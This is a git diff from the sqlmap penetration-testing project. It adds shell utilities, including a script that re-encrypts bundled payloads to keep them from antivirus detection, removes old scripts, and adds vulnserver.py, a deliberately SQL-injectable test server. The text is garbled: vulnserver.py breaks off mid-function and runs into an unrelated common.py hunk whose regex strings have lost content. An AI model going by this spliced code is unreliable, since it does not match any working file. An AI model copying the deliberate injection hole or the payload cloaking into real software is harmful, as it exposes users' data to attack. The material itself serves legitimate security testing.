_.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi + +cd $PROJECT_FULLPATH && git ls-files | sort | uniq | grep -Pv '^\.|sha256' | xargs sha256sum > $DIGEST_FULLPATH && cd - +git add "$DIGEST_FULLPATH" diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh new file mode 100755 index 00000000000..8b3f0121f0f --- /dev/null +++ b/extra/shutils/pycodestyle.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) +find . 
-wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \; diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh new file mode 100755 index 00000000000..20c62373daf --- /dev/null +++ b/extra/shutils/pydiatra.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# Runs py3diatra on all python files (prerequisite: pip install pydiatra) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py3diatra '{}' \; | grep -v bare-except diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh old mode 100644 new mode 100755 index 815b98e7c23..cbe37a7a0a8 --- a/extra/shutils/pyflakes.sh +++ b/extra/shutils/pyflakes.sh @@ -1,7 +1,7 @@ #!/bin/bash -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes3 '{}' \; | grep -v "redefines '_'" diff --git a/extra/shutils/pylint.py b/extra/shutils/pylint.py deleted file mode 100644 index 440f638a6d6..00000000000 --- a/extra/shutils/pylint.py +++ /dev/null @@ -1,50 +0,0 @@ -#! /usr/bin/env python - -# Runs pylint on all python scripts found in a directory tree -# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html - -import os -import re -import sys - -total = 0.0 -count = 0 - -__RATING__ = False - -def check(module): - global total, count - - if module[-3:] == ".py": - - print "CHECKING ", module - pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') - for line in pout: - if re.match("E....:.", line): - print line - if __RATING__ and "Your code has been rated at" in line: - print line - score = re.findall("\d.\d\d", line)[0] - total += float(score) - count += 1 - -if __name__ == "__main__": - try: - print sys.argv - BASE_DIRECTORY = sys.argv[1] - except IndexError: - print "no directory specified, defaulting to current working directory" - BASE_DIRECTORY = os.getcwd() - - print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY - for root, dirs, files in os.walk(BASE_DIRECTORY): - if any(_ in root for _ in ("extra", "thirdparty")): - continue - for name in files: - filepath = os.path.join(root, name) - check(filepath) - - if __RATING__: - print "==" * 50 - print "%d modules found" % count - print "AVERAGE SCORE = %.02f" % (total / count) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh new file mode 100755 index 00000000000..3cdbdf5d714 --- /dev/null +++ b/extra/shutils/pypi.sh @@ -0,0 +1,192 @@ +#!/bin/bash +set -euo pipefail +IFS=$'\n\t' + +if [ ! -f ~/.pypirc ]; then + echo "File ~/.pypirc is missing" + exit 1 +fi + +declare -x SCRIPTPATH="${0}" +SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py" +VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' 
-f 1-3) +TYPE=pip +TMP_DIR="$(mktemp -d -t pypi.XXXXXXXX)" +cleanup() { rm -rf -- "${TMP_DIR:?}"; } +trap cleanup EXIT +cd "$TMP_DIR" +cat > "$TMP_DIR/setup.py" << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from setuptools import setup, find_packages + +setup( + name='sqlmap', + version='$VERSION', + description='Automatic SQL injection and database takeover tool', + long_description=open('README.rst').read(), + long_description_content_type='text/x-rst', + author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', + author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', + url='https://sqlmap.org', + project_urls={ + 'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki', + 'Source': 'https://github.com/sqlmapproject/sqlmap/', + 'Tracker': 'https://github.com/sqlmapproject/sqlmap/issues', + }, + download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', + license='GNU General Public License v2 (GPLv2)', + packages=['sqlmap'], + package_dir={'sqlmap':'sqlmap'}, + include_package_data=True, + zip_safe=False, + # https://pypi.python.org/pypi?%3Aaction=list_classifiers + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', + 'Natural Language :: English', + 'Operating System :: OS Independent', + 'Programming Language :: Python', + 'Environment :: Console', + 'Topic :: Database', + 'Topic :: Security', + ], + entry_points={ + 'console_scripts': [ + 'sqlmap = sqlmap.sqlmap:main', + ], + }, +) +EOF +wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip +unzip sqlmap.zip +rm sqlmap.zip +mv "sqlmap-$VERSION" sqlmap +cat > sqlmap/__init__.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import sys + +sys.dont_write_bytecode = True +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +EOF +cat > README.rst << "EOF" +sqlmap +====== + +|Python 2.7|3.x| |License| |X| + +sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over +of database servers. It comes with a powerful detection engine, many +niche features for the ultimate penetration tester and a broad range of +switches lasting from database fingerprinting, over data fetching from +the database, to accessing the underlying file system and executing +commands on the operating system via out-of-band connections. + +Screenshots +----------- + +.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png + :alt: Screenshot + + +You can visit the `collection of +screenshots `__ +demonstrating some of features on the wiki. + +Installation +------------ + +You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: :: + + pip install --upgrade sqlmap + +Alternatively, you can download the latest tarball by clicking +`here `__ or +latest zipball by clicking +`here `__. + +If you prefer fetching daily updates, you can download sqlmap by cloning the +`Git `__ repository: + +:: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with +`Python `__ version **2.7** and +**3.x** on any platform. 
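The setup.py generated earlier in this script declares a console_scripts entry point ('sqlmap = sqlmap.sqlmap:main'), so after installation the sqlmap command behaves roughly like the following wrapper (a sketch of the standard setuptools behaviour; the actual wrapper is generated at install time and is not a file shipped by the project):

::

    import sys
    from sqlmap.sqlmap import main

    if __name__ == "__main__":
        sys.exit(main())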
+ +Usage +----- + +To get a list of basic options and switches use: + +:: + + sqlmap -h + +To get a list of all options and switches use: + +:: + + sqlmap -hh + +You can find a sample run `here `__. To +get an overview of sqlmap capabilities, list of supported features and +description of all options and switches, along with examples, you are +advised to consult the `user's +manual `__. + +Links +----- + +- Homepage: https://sqlmap.org +- Download: + `.tar.gz `__ + or `.zip `__ +- Commits RSS feed: + https://github.com/sqlmapproject/sqlmap/commits/master.atom +- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +- User's manual: https://github.com/sqlmapproject/sqlmap/wiki +- Frequently Asked Questions (FAQ): + https://github.com/sqlmapproject/sqlmap/wiki/FAQ +- X: https://x.com/sqlmap +- Demos: http://www.youtube.com/user/inquisb/videos +- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +.. |Python 2.7|3.x| image:: https://img.shields.io/badge/python-2.7|3.x-yellow.svg + :target: https://www.python.org/ +.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg + :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE +.. |X| image:: https://img.shields.io/badge/x-@sqlmap-blue.svg + :target: https://x.com/sqlmap + +.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md +.. http://rst.ninjs.org/ +EOF +sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py +sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py +: > MANIFEST.in +while IFS= read -r -d '' file; do + case "$file" in + *.git|*.yml) continue ;; + esac + echo "include $file" >> MANIFEST.in +done < <(find sqlmap -type f -print0) +python setup.py sdist bdist_wheel +twine check dist/* +twine upload --config-file=~/.pypirc dist/* +rm -rf "$TMP_DIR" diff --git a/extra/shutils/recloak.sh b/extra/shutils/recloak.sh new file mode 100755 index 00000000000..557ea51d96f --- /dev/null +++ b/extra/shutils/recloak.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +# NOTE: this script is for dev usage after AV something something + +DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P) + +cd $DIR/../.. +for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done + +cd $DIR/../cloak +sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py + +cd $DIR/../.. 
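recloak.sh decloaks every cloaked payload (files whose extension ends with an underscore) via extra/cloak/cloak.py -d, rotates the KEY embedded in cloak.py, and then, in the loop that follows, cloaks the plain files again. A hypothetical Python driver for the same decloak/re-cloak round trip, using only the cloak.py options (-d and -i) that the shell script itself relies on, might look like:

    # Hypothetical driver mirroring recloak.sh: decloak every *_ payload, then
    # (once cloak.py's KEY has been rotated) cloak the plain files back again.
    # Assumes it is run from the repository root, like the shell script.
    import os
    import re
    import subprocess

    CLOAK = os.path.join("extra", "cloak", "cloak.py")

    def cloaked_files(root="."):
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                if re.search(r"\.[a-z]*_$", name) and "wordlist" not in path:
                    yield path

    targets = list(cloaked_files())

    for path in targets:
        # decloak (e.g. foo.exe_ -> foo.exe)
        subprocess.check_call(["python", CLOAK, "-d", "-i", path])

    # ... rotate KEY inside extra/cloak/cloak.py here, as the sed call above does ...

    for path in targets:
        # cloak again (foo.exe -> foo.exe_)
        subprocess.check_call(["python", CLOAK, "-i", path[:-1]])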
+for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done + +git clean -f > /dev/null diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py deleted file mode 100644 index 0ec23769f88..00000000000 --- a/extra/shutils/regressiontest.py +++ /dev/null @@ -1,152 +0,0 @@ -#!/usr/bin/env python - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -import codecs -import inspect -import os -import re -import smtplib -import subprocess -import sys -import time -import traceback - -from email.mime.multipart import MIMEMultipart -from email.mime.text import MIMEText - -sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe())))) - -from lib.core.revision import getRevisionNumber - -TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) -SQLMAP_HOME = "/opt/sqlmap" -REVISION = getRevisionNumber() - -SMTP_SERVER = "127.0.0.1" -SMTP_PORT = 25 -SMTP_TIMEOUT = 30 -FROM = "regressiontest@sqlmap.org" -#TO = "dev@sqlmap.org" -TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] -SUBJECT = "Regression test on %s using revision %s" % (TIME, REVISION) - -def prepare_email(content): - global FROM - global TO - global SUBJECT - - msg = MIMEMultipart() - msg["Subject"] = SUBJECT - msg["From"] = FROM - msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) - - msg.attach(MIMEText(content)) - - return msg - -def send_email(msg): - global SMTP_SERVER - global SMTP_PORT - global SMTP_TIMEOUT - - try: - s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT) - s.sendmail(FROM, TO, msg.as_string()) - s.quit() - # Catch all for SMTP exceptions - except smtplib.SMTPException, e: - print "Failure to send email: %s" % str(e) - -def main(): - global SUBJECT - - content = "" - test_counts = [] - attachments = {} - - command_line = "python /opt/sqlmap/sqlmap.py --live-test" - proc = subprocess.Popen(command_line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - - proc.wait() - stdout, stderr = proc.communicate() - - if stderr: - msg = prepare_email("Execution of regression test failed with error:\n\n%s" % stderr) - send_email(msg) - sys.exit(1) - - failed_tests = re.findall("running live test case: (.+?) 
\((\d+)\/\d+\)[\r]*\n.+test failed (at parsing item \"(.+)\" )?\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) - - for failed_test in failed_tests: - title = failed_test[0] - test_count = int(failed_test[1]) - parse = failed_test[3] if failed_test[3] else None - output_folder = failed_test[4] - traceback = False if failed_test[5] == "False" else bool(failed_test[5]) - detected = False if failed_test[6] else True - - test_counts.append(test_count) - - console_output_file = os.path.join(output_folder, "console_output") - log_file = os.path.join(output_folder, "debiandev", "log") - traceback_file = os.path.join(output_folder, "traceback") - - if os.path.exists(console_output_file): - console_output_fd = codecs.open(console_output_file, "rb", "utf8") - console_output = console_output_fd.read() - console_output_fd.close() - attachments[test_count] = str(console_output) - - if os.path.exists(log_file): - log_fd = codecs.open(log_file, "rb", "utf8") - log = log_fd.read() - log_fd.close() - - if os.path.exists(traceback_file): - traceback_fd = codecs.open(traceback_file, "rb", "utf8") - traceback = traceback_fd.read() - traceback_fd.close() - - content += "Failed test case '%s' (#%d)" % (title, test_count) - - if parse: - content += " at parsing: %s:\n\n" % parse - content += "### Log file:\n\n" - content += "%s\n\n" % log - elif not detected: - content += " - SQL injection not detected\n\n" - else: - content += "\n\n" - - if traceback: - content += "### Traceback:\n\n" - content += "%s\n\n" % str(traceback) - - content += "#######################################################################\n\n" - - if content: - content += "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) - SUBJECT += " (%s)" % ", ".join("#%d" % count for count in test_counts) - - msg = prepare_email(content) - - for test_count, attachment in attachments.items(): - attachment = MIMEText(attachment) - attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count) - msg.attach(attachment) - - send_email(msg) - -if __name__ == "__main__": - log_fd = open("/tmp/sqlmapregressiontest.log", "wb") - log_fd.write("Regression test started at %s\n" % TIME) - - try: - main() - except Exception, e: - log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc())) - - log_fd.write("Regression test finished at %s\n\n" % TIME) - log_fd.close() diff --git a/extra/shutils/strip.sh b/extra/shutils/strip.sh new file mode 100755 index 00000000000..0fa81ef62f9 --- /dev/null +++ b/extra/shutils/strip.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/ +# http://www.muppetlabs.com/~breadbox/software/elfkickers.html +# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html + +# https://github.com/BR903/ELFkickers/tree/master/sstrip +# https://www.ubuntuupdates.org/package/core/cosmic/universe/updates/postgresql-server-dev-10 + +# For example: +# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_ +# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so +# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so +# rm lib_postgresqludf_sys.so + +strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $* +sstrip $* + diff --git 
a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py deleted file mode 100644 index 9e1072a9c4f..00000000000 --- a/extra/sqlharvest/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py deleted file mode 100644 index da974e32a0e..00000000000 --- a/extra/sqlharvest/sqlharvest.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import re -import socket -import sys -import urllib -import urllib2 -import ConfigParser - -from operator import itemgetter - -TIMEOUT = 10 -CONFIG_FILE = 'sqlharvest.cfg' -TABLES_FILE = 'tables.txt' -USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' -SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' -MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it -QUERY = 'CREATE TABLE ext:sql' -REGEX_URLS = r';u=([^"]+?)&q=' -REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P[^\(;]+)' - -def main(): - tables = dict() - cookies = cookielib.CookieJar() - cookie_processor = urllib2.HTTPCookieProcessor(cookies) - opener = urllib2.build_opener(cookie_processor) - opener.addheaders = [("User-Agent", USER_AGENT)] - - conn = opener.open(SEARCH_URL) - page = conn.read() # set initial cookie values - - config = ConfigParser.ConfigParser() - config.read(CONFIG_FILE) - - if not config.has_section("options"): - config.add_section("options") - if not config.has_option("options", "index"): - config.set("options", "index", "0") - - i = int(config.get("options", "index")) - - try: - with open(TABLES_FILE, 'r') as f: - for line in f.xreadlines(): - if len(line) > 0 and ',' in line: - temp = line.split(',') - tables[temp[0]] = int(temp[1]) - except: - pass - - socket.setdefaulttimeout(TIMEOUT) - - files, old_files = None, None - try: - while True: - abort = False - old_files = files - files = [] - - try: - conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10)) - page = conn.read() - for match in re.finditer(REGEX_URLS, page): - files.append(urllib.unquote(match.group(1))) - if len(files) >= 10: - break - abort = (files == old_files) - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - if abort: - break - - sys.stdout.write("\n---------------\n") - sys.stdout.write("Result page #%d\n" % (i + 1)) - sys.stdout.write("---------------\n") - - for sqlfile in files: - print sqlfile - - try: - req = urllib2.Request(sqlfile) - response = urllib2.urlopen(req) - - if "Content-Length" in response.headers: - if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE: - continue - - page = response.read() - found = False - counter = 0 - - for match in re.finditer(REGEX_RESULT, page): - counter += 1 - table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]') - - if table and not any(_ in table for _ in ('>', '<', '--', ' ')): - found = True - sys.stdout.write('*') - - if table in tables: - tables[table] += 1 - else: - tables[table] = 1 - if found: - sys.stdout.write("\n") - - except KeyboardInterrupt: - raise - - except Exception, msg: - print msg - - else: - i += 1 - - except 
KeyboardInterrupt: - pass - - finally: - with open(TABLES_FILE, 'w+') as f: - tables = sorted(tables.items(), key=itemgetter(1), reverse=True) - for table, count in tables: - f.write("%s,%d\n" % (table, count)) - - config.set("options", "index", str(i + 1)) - with open(CONFIG_FILE, 'w+') as f: - config.write(f) - -if __name__ == "__main__": - main() diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py new file mode 100644 index 00000000000..bcac841631b --- /dev/null +++ b/extra/vulnserver/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py new file mode 100644 index 00000000000..769108f928d --- /dev/null +++ b/extra/vulnserver/vulnserver.py @@ -0,0 +1,353 @@ +#!/usr/bin/env python + +""" +vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes) + +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import base64 +import json +import random +import re +import sqlite3 +import string +import sys +import threading +import traceback + +PY3 = sys.version_info >= (3, 0) +UNICODE_ENCODING = "utf-8" +DEBUG = False + +if PY3: + from http.client import INTERNAL_SERVER_ERROR + from http.client import NOT_FOUND + from http.client import OK + from http.server import BaseHTTPRequestHandler + from http.server import HTTPServer + from socketserver import ThreadingMixIn + from urllib.parse import parse_qs + from urllib.parse import unquote_plus +else: + from BaseHTTPServer import BaseHTTPRequestHandler + from BaseHTTPServer import HTTPServer + from httplib import INTERNAL_SERVER_ERROR + from httplib import NOT_FOUND + from httplib import OK + from SocketServer import ThreadingMixIn + from urlparse import parse_qs + from urllib import unquote_plus + +SCHEMA = """ + CREATE TABLE users ( + id INTEGER, + name TEXT, + surname TEXT, + PRIMARY KEY (id) + ); + INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset'); + INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny'); + INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming'); + INSERT INTO users (id, name, surname) VALUES (4, NULL, 'nameisnull'); + INSERT INTO users (id, name, surname) VALUES (5, 'mark', 'lewis'); + INSERT INTO users (id, name, surname) VALUES (6, 'ada', 'lovelace'); + INSERT INTO users (id, name, surname) VALUES (7, 'grace', 'hopper'); + INSERT INTO users (id, name, surname) VALUES (8, 'alan', 'turing'); + INSERT INTO users (id, name, surname) VALUES (9, 'margaret','hamilton'); + INSERT INTO users (id, name, surname) VALUES (10, 'donald', 'knuth'); + INSERT INTO users (id, name, surname) VALUES (11, 'tim', 'bernerslee'); + INSERT INTO users (id, name, surname) VALUES (12, 'linus', 'torvalds'); + INSERT INTO users (id, name, surname) VALUES (13, 'ken', 'thompson'); + INSERT INTO users (id, name, surname) VALUES (14, 'dennis', 'ritchie'); + INSERT INTO users (id, name, surname) VALUES (15, 'barbara', 'liskov'); + INSERT INTO users (id, name, surname) VALUES (16, 'edsger', 'dijkstra'); + INSERT INTO users (id, name, surname) VALUES (17, 'john', 'mccarthy'); + INSERT INTO users (id, name, surname) VALUES (18, 'leslie', 'lamport'); + INSERT INTO users (id, name, surname) VALUES (19, 'niklaus', 'wirth'); + INSERT INTO users (id, name, surname) VALUES (20, 
'bjarne', 'stroustrup'); + INSERT INTO users (id, name, surname) VALUES (21, 'guido', 'vanrossum'); + INSERT INTO users (id, name, surname) VALUES (22, 'brendan', 'eich'); + INSERT INTO users (id, name, surname) VALUES (23, 'james', 'gosling'); + INSERT INTO users (id, name, surname) VALUES (24, 'andrew', 'tanenbaum'); + INSERT INTO users (id, name, surname) VALUES (25, 'yukihiro','matsumoto'); + INSERT INTO users (id, name, surname) VALUES (26, 'radia', 'perlman'); + INSERT INTO users (id, name, surname) VALUES (27, 'katherine','johnson'); + INSERT INTO users (id, name, surname) VALUES (28, 'hady', 'lamarr'); + INSERT INTO users (id, name, surname) VALUES (29, 'frank', 'miller'); + INSERT INTO users (id, name, surname) VALUES (30, 'john', 'steward'); + + CREATE TABLE creds ( + user_id INTEGER, + password_hash TEXT, + FOREIGN KEY (user_id) REFERENCES users(id) + ); + INSERT INTO creds (user_id, password_hash) VALUES (1, 'db3a16990a0008a3b04707fdef6584a0'); + INSERT INTO creds (user_id, password_hash) VALUES (2, '4db967ce67b15e7fb84c266a76684729'); + INSERT INTO creds (user_id, password_hash) VALUES (3, 'f5a2950eaa10f9e99896800eacbe8275'); + INSERT INTO creds (user_id, password_hash) VALUES (4, NULL); + INSERT INTO creds (user_id, password_hash) VALUES (5, '179ad45c6ce2cb97cf1029e212046e81'); + INSERT INTO creds (user_id, password_hash) VALUES (6, '0f1e2d3c4b5a69788796a5b4c3d2e1f0'); + INSERT INTO creds (user_id, password_hash) VALUES (7, 'a1b2c3d4e5f60718293a4b5c6d7e8f90'); + INSERT INTO creds (user_id, password_hash) VALUES (8, '1a2b3c4d5e6f708192a3b4c5d6e7f809'); + INSERT INTO creds (user_id, password_hash) VALUES (9, '9f8e7d6c5b4a3928170605f4e3d2c1b0'); + INSERT INTO creds (user_id, password_hash) VALUES (10, '3c2d1e0f9a8b7c6d5e4f30291807f6e5'); + INSERT INTO creds (user_id, password_hash) VALUES (11, 'b0c1d2e3f405162738495a6b7c8d9eaf'); + INSERT INTO creds (user_id, password_hash) VALUES (12, '6e5d4c3b2a190807f6e5d4c3b2a1908f'); + INSERT INTO creds (user_id, password_hash) VALUES (13, '11223344556677889900aabbccddeeff'); + INSERT INTO creds (user_id, password_hash) VALUES (14, 'ffeeddccbbaa00998877665544332211'); + INSERT INTO creds (user_id, password_hash) VALUES (15, '1234567890abcdef1234567890abcdef'); + INSERT INTO creds (user_id, password_hash) VALUES (16, 'abcdef1234567890abcdef1234567890'); + INSERT INTO creds (user_id, password_hash) VALUES (17, '0a1b2c3d4e5f60718a9b0c1d2e3f4051'); + INSERT INTO creds (user_id, password_hash) VALUES (18, '51f04e3d2c1b0a9871605f4e3d2c1b0a'); + INSERT INTO creds (user_id, password_hash) VALUES (19, '89abcdef0123456789abcdef01234567'); + INSERT INTO creds (user_id, password_hash) VALUES (20, '76543210fedcba9876543210fedcba98'); + INSERT INTO creds (user_id, password_hash) VALUES (21, '13579bdf2468ace013579bdf2468ace0'); + INSERT INTO creds (user_id, password_hash) VALUES (22, '02468ace13579bdf02468ace13579bdf'); + INSERT INTO creds (user_id, password_hash) VALUES (23, 'deadbeefdeadbeefdeadbeefdeadbeef'); + INSERT INTO creds (user_id, password_hash) VALUES (24, 'cafebabecafebabecafebabecafebabe'); + INSERT INTO creds (user_id, password_hash) VALUES (25, '00112233445566778899aabbccddeeff'); + INSERT INTO creds (user_id, password_hash) VALUES (26, 'f0e1d2c3b4a5968778695a4b3c2d1e0f'); + INSERT INTO creds (user_id, password_hash) VALUES (27, '7f6e5d4c3b2a190807f6e5d4c3b2a190'); + INSERT INTO creds (user_id, password_hash) VALUES (28, '908f7e6d5c4b3a291807f6e5d4c3b2a1'); + INSERT INTO creds (user_id, password_hash) VALUES (29, 
'3049b791fa83e2f42f37bae18634b92d'); + INSERT INTO creds (user_id, password_hash) VALUES (30, 'd59a348f90d757c7da30418773424b5e'); +""" + +LISTEN_ADDRESS = "localhost" +LISTEN_PORT = 8440 + +_conn = None +_cursor = None +_lock = None +_server = None +_alive = False +_csrf_token = None + +def init(quiet=False): + global _conn + global _cursor + global _lock + global _csrf_token + + _csrf_token = "".join(random.sample(string.ascii_letters + string.digits, 20)) + + _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False) + _cursor = _conn.cursor() + _lock = threading.Lock() + + _cursor.executescript(SCHEMA) + + if quiet: + global print + + def _(*args, **kwargs): + pass + + print = _ + +class ThreadingServer(ThreadingMixIn, HTTPServer): + def finish_request(self, *args, **kwargs): + try: + HTTPServer.finish_request(self, *args, **kwargs) + except Exception: + if DEBUG: + traceback.print_exc() + +class ReqHandler(BaseHTTPRequestHandler): + def do_REQUEST(self): + path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") + params = {} + + if query: + params.update(parse_qs(query)) + + if "||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page) - while retVal.find(" ") != -1: - retVal = retVal.replace(" ", " ") - retVal = htmlunescape(retVal) + if isinstance(page, six.text_type): + retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) + retVal = re.sub(r"%s{2,}" % split, split, retVal) + retVal = htmlUnescape(retVal.strip().strip(split)) return retVal def getPageWordSet(page): """ Returns word set used in page content + + >>> sorted(getPageWordSet(u'foobartest')) == [u'foobar', u'test'] + True """ retVal = set() # only if the page's charset has been successfully identified - if isinstance(page, unicode): - _ = getFilteredPageContent(page) - retVal = set(re.findall(r"\w+", _)) + if isinstance(page, six.string_types): + retVal = set(_.group(0) for _ in re.finditer(r"\w+", getFilteredPageContent(page))) return retVal -def showStaticWords(firstPage, secondPage): +def showStaticWords(firstPage, secondPage, minLength=3): + """ + Prints words appearing in two different response pages + + >>> showStaticWords("this is a test", "this is another test") + ['this'] + """ + infoMsg = "finding static words in longest matching part of dynamic page content" logger.info(infoMsg) @@ -1434,12 +2290,11 @@ def showStaticWords(firstPage, secondPage): commonWords = None if commonWords: - commonWords = list(commonWords) - commonWords.sort(lambda a, b: cmp(a.lower(), b.lower())) + commonWords = [_ for _ in commonWords if len(_) >= minLength] + commonWords.sort(key=functools.cmp_to_key(lambda a, b: cmp(a.lower(), b.lower()))) for word in commonWords: - if len(word) > 2: - infoMsg += "'%s', " % word + infoMsg += "'%s', " % word infoMsg = infoMsg.rstrip(", ") else: @@ -1447,34 +2302,41 @@ def showStaticWords(firstPage, secondPage): logger.info(infoMsg) + return commonWords + def 